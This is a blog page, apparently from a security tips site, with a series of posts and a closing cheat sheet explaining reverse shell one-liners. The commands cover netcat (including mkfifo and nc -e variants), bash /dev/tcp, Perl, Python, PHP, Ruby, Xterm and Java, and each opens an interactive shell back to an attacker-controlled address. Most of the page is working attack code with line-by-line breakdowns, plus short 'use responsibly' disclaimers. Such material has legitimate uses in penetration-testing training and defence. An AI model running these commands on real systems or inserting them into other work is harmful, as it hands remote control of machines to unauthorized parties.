...

December 18, 2023

Netcat-Reverse-Shell-Explained

Netcat Reverse Shell Breakdown

Leave a Comment /

1. Establish a listening connection on your machine

nc -l -p <your_port>

This command starts netcat in listening mode (-l) on a specific port (-p <your_port>). It means your machine will be ready to accept incoming connections on the specified port.

 

2. Instruct the target system to connect back to you:

nc <your_ip> <your_port>

This command is intended to be executed on the target system. It tells the target system to initiate a connection back to your machine’s IP address (<your_ip>) on the specified port (<your_port>). This essentially establishes a reverse shell, where the target system connects back to your listening netcat instance.

 

Bonus Tip: Alternative using a named pipe and shell:

 

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> <your_port> >/tmp/f

 

This command does the following:

  • Removes any existing file named /tmp/f.

 

  • Creates a named pipe (mkfifo /tmp/f), which is a special type of file used for inter-process communication.

 

  • Reads from the named pipe (cat /tmp/f) and pipes it to /bin/sh -i 2>&1. This essentially opens an interactive shell.

 

  • Sends the output of the shell to your machine using nc <your_ip> <your_port>.

 

  • Writes the received data back to the named pipe (>/tmp/f).

 

This alternative command achieves a similar result as the previous example but uses a named pipe for the communication between the shell and netcat.

Netcat Reverse Shell Breakdown Read More »

Bash Reverse Shell Explained

Bash Reverse Shell Breakdown

Leave a Comment /

Bash Reverse Shell Breakdown:

bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1
  • bash: Invokes the Bash shell.

 

  • -i: Launches an interactive Bash session, providing an interactive shell to the user.

 

  • >& /dev/tcp/<your_ip>/<your_port>: Redirects both standard output (stdout) and standard error (stderr) to the specified TCP connection. /dev/tcp/<your_ip>/<your_port> is a special file path that Bash uses for network connections.

 

  • 0>&1: Redirects standard input (stdin) to the same location as standard output, effectively tying stdin to the TCP connection.

 

let’s replace <your_ip> and <your_port> with actual values:

bash -i >& /dev/tcp/192.168.1.2/4444 0>&1

 

In this example:

  • <your_ip> is replaced with 192.168.1.2 (your machine’s IP).

 

  • <your_port> is replaced with 4444 (a chosen port number).

 

When this command is executed on the target system, it will initiate a connection back to your machine’s IP address on the specified port, effectively creating a reverse shell. The interactive shell on the target system will be connected to your machine, allowing you to execute commands remotely.

Bash Reverse Shell Breakdown Read More »

PERL REVERSE SHELL EXPLAINED

Perl Reverse Shell Breakdown

Leave a Comment /

Perl Reverse Shell Breakdown

perl -e 'use Socket;$i="<your_ip>";$p=<your_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • perl -e: Executes the following Perl code provided as a command-line argument.

 

  • ‘use Socket;$i=”<your_ip>”;$p=<your_port>;…: This part of the code initializes variables and sets up a socket connection.

 

    • $i=”<your_ip>”;$p=<your_port>;: Replace <your_ip> with your machine’s IP and <your_port> with a chosen port number.

 

    • socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));: Creates a socket using the PF_INET family, SOCK_STREAM socket type, and the TCP protocol.

 

    • if(connect(S,sockaddr_in($p,inet_aton($i)))){…}: Attempts to connect to the specified IP address and port.

 

      • sockaddr_in($p,inet_aton($i)): Converts the IP address and port into a sockaddr structure.

 

      • If the connection is successful, the following commands are executed:

 

        • open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);: Duplicates the socket handle to standard input, output, and error.

 

        • exec(“/bin/sh -i”);: Executes an interactive shell (/bin/sh -i).

 

When this Perl one-liner is executed on the target system, it attempts to connect back to your machine’s IP on the specified port. If successful, it opens an interactive shell, allowing you to execute commands remotely.

 

Use such commands responsibly and with proper authorization, as they can be misused for unauthorized access. Ensure compliance with ethical and legal standards.

Perl Reverse Shell Breakdown Read More »

Python Reverse Shell Explained

Python Reverse Shell Breakdown

Leave a Comment /

Python Reverse Shell Breakdown

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • python -c: Executes the following Python code provided as a command-line argument.

 

  • ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);…: This part of the code imports necessary modules and sets up a socket connection.

 

    • s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);: Creates a socket using the AF_INET family and SOCK_STREAM socket type.

 

    • s.connect((“10.0.0.1”,1234));: Connects to the specified IP address (10.0.0.1) and port (1234).

 

    • os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);: Duplicates the socket file descriptor to standard input, output, and error, establishing a connection.

 

    • p=subprocess.call([“/bin/sh”,”-i”]);: Calls /bin/sh -i as a subprocess, creating an interactive shell.

 

When this Python one-liner is executed on the target system (Python 2), it attempts to connect back to the specified IP address and port, creating a reverse shell. If successful, it opens an interactive shell, allowing you to execute commands remotely.

 

As with any remote access tool, use such commands responsibly and only with proper authorization, as they can be misused for unauthorized access. Always ensure compliance with ethical and legal standards.

Python Reverse Shell Breakdown Read More »

PHP Reverse Shell Explained

PHP Reverse Shell Breakdown

Leave a Comment /

PHP Reverse Shell Breakdown

 

php -r '$sock=fsockopen("<your_ip>",<your_port>);exec("/bin/sh -i <&3 >&3 2>&3");'
  • php -r: Executes the following PHP code provided as a command-line argument.

 

  • ‘$sock=fsockopen(“<your_ip>”,<your_port>);: Initializes a socket connection in PHP using fsockopen() to the specified IP address (<your_ip>) and port (<your_port>).

 

  • exec(“/bin/sh -i <&3 >&3 2>&3”);: Executes a shell command using exec(). This command opens an interactive shell (/bin/sh -i) and redirects input, output, and error streams to file descriptor 3 (<&3 >&3 2>&3).

 

    • <&3: Redirects standard input (stdin) from file descriptor 3.

 

    • >&3: Redirects standard output (stdout) to file descriptor 3.

 

    • 2>&3: Redirects standard error (stderr) to file descriptor 3.

 

When this PHP one-liner is executed on the target system, it attempts to connect back to your specified IP address and port, creating a reverse shell. If successful, it opens an interactive shell, allowing you to execute commands remotely.

 

As always, use such commands responsibly and only with proper authorization, as they can be misused for unauthorized access. Ensure compliance with ethical and legal standards.

PHP Reverse Shell Breakdown Read More »

Ruby Reverse Shell Explained

Ruby Reverse Shell Breakdown

Leave a Comment /

Ruby Reverse Shell Breakdown

 

'ruby -rsocket -e'f=TCPSocket.open("<your_ip>",<your_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  • ‘ruby -rsocket -e’: Executes the following Ruby code provided as a command-line argument.

 

  • f=TCPSocket.open(“<your_ip>”,<your_port>).to_i;: Creates a TCPSocket connection to the specified IP address (<your_ip>) and port (<your_port>) and assigns the socket file descriptor to variable f.

 

  • exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f): Executes a shell command using exec. This command opens an interactive shell (/bin/sh -i) and redirects input, output, and error streams to the file descriptor f.

 

    • <&%d: Redirects standard input (stdin) from file descriptor f.

 

    • >&%d: Redirects standard output (stdout) to file descriptor f.

 

    • 2>&%d: Redirects standard error (stderr) to file descriptor f.

 

This Ruby one-liner creates a reverse shell by establishing a TCP connection to the specified IP and port. It then opens an interactive shell with input, output, and error streams redirected through the file descriptor f.

 

As always, use such commands responsibly and only with proper authorization, as they can be misused for unauthorized access. Ensure compliance with ethical and legal standards.

Ruby Reverse Shell Breakdown Read More »

Xterm Reverse Shell Explained

Xterm Reverse Shell Breakdown

Leave a Comment /

On Your Server, Initiate the Command:

xterm -display <your_ip>:1
  • xterm: Launches the Xterm terminal emulator.

 

  • -display <your_ip>:1: Specifies the display to connect to, where <your_ip> is your server’s IP address and :1 indicates display number 1.

 

On Your System, Open an X-Server with:

Xnest :1
  • Xnest: Starts a nested X server.

 

  • :1: Specifies the display number to use for the nested X server (in this case, display number 1).

 

Authorize the Target System to Connect with:

xhost +targetip
  • xhost: Manages host access to the X server.

 

  • +targetip: Allows the specified target IP address to connect to the X server.

 

Breakdown Summary:

 

  • The first command (xterm -display <your_ip>:1) initiates an Xterm on your server, specifying the display to connect to.

 

  • The second command (Xnest :1) opens a nested X server on your system using display number 1.

 

  • The third command (xhost +targetip) authorizes the target system (specified by targetip) to connect to the X server.

 

This process essentially allows the target system to display graphical applications on your server’s X server. It’s important to note that using xhost with the + option, as shown in the third command, opens up X server access and should be used cautiously to avoid security risks. Always use such commands responsibly and in appropriate security contexts.

Xterm Reverse Shell Breakdown Read More »

Java Reverse Shell Explained

Java Reverse Shell Breakdown

Leave a Comment /

Java Reverse Shell Breakdown

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
  • r = Runtime.getRuntime(): Retrieves the Java Runtime instance, which allows the application to interface with the environment in which the application is running.

 

  • p = r.exec([…]): Executes the specified command in a separate process. In this case, it runs a Bash command to create a reverse shell.

 

    • [“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]: An array of strings representing the command to be executed. This Bash command does the following:

 

      • exec 5<>/dev/tcp/10.0.0.1/2002: Opens a connection to the specified IP address (10.0.0.1) and port (2002) and associates file descriptor 5 with the socket.

 

      • cat <&5 | while read line; do \$line 2>&5 >&5; done: Reads input from the socket file descriptor (5) and writes it to the standard input of the Bash shell. This effectively creates a reverse shell, allowing for command execution on the target system.

 

  • p.waitFor(): Waits for the process represented by p to complete. This ensures that the Java program will wait for the reverse shell process to finish before proceeding.

 

 

The provided code assumes access to the /bin/bash shell and the availability of the /dev/tcp feature, which may not be present on all systems. Always use such commands responsibly and inappropriate security contexts.

Java Reverse Shell Breakdown Read More »

What is Reverse Shell? Reverse Shell Cheat Sheet

What is Reverse Shell? Reverse Shell Cheat Sheet

Leave a Comment /

Introduction:

We’re going to take a look at reverse shells today and use a simple cheat sheet to help you understand their nuances. Whatever your level of technical expertise, the goal of this guide is to streamline the procedure and make reverse shells useful and approachable. Let’s get straight to the point and avoid superfluous complications.

 

Understanding Reverse Shell:

Let’s make sure we grasp reverse shells thoroughly before we examine the cheat sheet. Imagine, essentially, a stealthy way to take remote control of a system; this would be an invaluable resource for system management, troubleshooting, and ethical hacking projects.

 

The Revealed Cheat Sheet:

1. Netcat:

 

    • Establish a listening connection on your machine: 
       nc -l -p <your_port>
    • Instruct the target system to connect back to you: 
      nc <your_ip> <your_port>

 

Bonus Tip: Should Netcat present challenges, consider the alternative:

    • rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> <your_port> >/tmp/f

 

2. Bash:
    • Instruct the target system to connect back to you: 
      bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

 

3. Perl:
    • Short version for the target system:
'perl -e 'use Socket;$i="<your_ip>";$p=<your_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

4. Python:
    • For Python 2 on the target system:
'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

5. PHP:
    • For the target system assuming FD 3:
'php -r '$sock=fsockopen("<your_ip>",<your_port>);exec("/bin/sh -i <&3 >&3 2>&3");'

 

6. Ruby:
    • For the target system:
'ruby -rsocket -e'f=TCPSocket.open("<your_ip>",<your_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

7. Netcat:
    • If netcat is present on the target system:
nc -e /bin/sh <your_ip> <your_port>

 

8. Xterm:
  • On your server, initiate the command: 
    xterm -display <your_ip>:1
  • On your system, open an X-Server with 
    Xnest :1
  • Authorize the target system to connect with: 
    xhost +targetip

 

9. Java:
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

 

Making Sense of the Cheat Sheet:

Feeling a bit overwhelmed? Fear not. Let’s make things easier:

 

Select Your Instrument:

Choose the approach that works best for the target system and your preferences.

 

Prepare for Connection:

Open a listening connection on your machine using netcat or a preferred tool.

 

Give the Connection Instructions:

To reconnect to your computer, run the reverse shell command on the target system.

 

Customize Your Commands:

Adjust the commands according to the particular shell environment, your IP address, and your preferred ports.

 

 

Conclusion:

Here you have it: a succinct and useful reverse shell cheat sheet. Whether you’re ethical hacking or troubleshooting, make sure to use your newly acquired skills appropriately. Not superfluous jargon, just useful tech tips. Happy hacking!

What is Reverse Shell? Reverse Shell Cheat Sheet Read More »

Scroll to Top
Seraphinite AcceleratorOptimized by Seraphinite Accelerator
Turns on site high speed to be attractive for people and search engines.